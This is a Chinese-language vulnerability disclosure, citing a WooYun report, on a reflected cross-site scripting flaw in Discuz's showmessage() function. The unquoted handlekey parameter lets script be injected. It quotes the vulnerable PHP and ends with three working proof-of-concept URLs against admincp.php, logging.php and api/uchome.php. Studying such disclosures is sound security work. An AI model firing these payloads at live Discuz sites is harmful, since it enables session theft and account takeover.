引用:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-084097.html
在/include/global.func.php 文件中 第1036-1119行中
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
if(empty($infloat)) {
$show_message .= $url_forward && empty($inajax) ? '<script>setTimeout("window.location.href =\''.$url_forward.'\';", '.$msgforward['refreshtime'].');</script>' : '';
} elseif($handlekey) {
$show_message = str_replace("'", "\'", $show_message);
if($url_forward) {
$show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($('return_$handlekey')) $('return_$handlekey').className = 'onright';\nif(typeof submithandle_$handlekey =='function') {submithandle_$handlekey('$url_forward', '$show_message');} else {location.href='$url_forward'}\n</script>";
} else {
$show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey =='function') {messagehandle_$handlekey('$messagehandle', '$show_message');}\n</script>";
}
}
if($advlist = array_merge($globaladvs ? $globaladvs['type'] : array(), $redirectadvs ? $redirectadvs['type'] : array())) {
$advitems = ($globaladvs ? $globaladvs['items'] : array()) + ($redirectadvs ? $redirectadvs['items'] : array());
foreach($advlist AS $type => $redirectadvs) {
$advlist[$type] = $advitems[$redirectadvs[array_rand($redirectadvs)]];
}
}
if($extra == 'NOPERM') {
include template('nopermission');
} else {
include template('showmessage');
}
dexit();
}
在这段代码中:
elseif($handlekey) {
$show_message = str_replace("'", "\'", $show_message);
if($url_forward) {
$show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($('return_$handlekey')) $('return_$handlekey').className = 'onright';\nif(typeof submithandle_$handlekey =='function') {submithandle_$handlekey('$url_forward', '$show_message');} else {location.href='$url_forward'}\n</script>";
} else {
$show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey =='function') {messagehandle_$handlekey('$messagehandle', '$show_message');}\n</script>";
}
}
如果不存在$url_forward参数就走else,
然而这个$handlekey并没有加引号,所以不存在绕不绕过,直接触发。
漏洞url:
/admincp.php?infloat=yes&handlekey=123);alert(/xss/);//
/logging.php?infloat=yes&handlekey=123);alert(/xss/);//
/api/uchome.php?infloat=yes&handlekey=123);alert(/xss/);//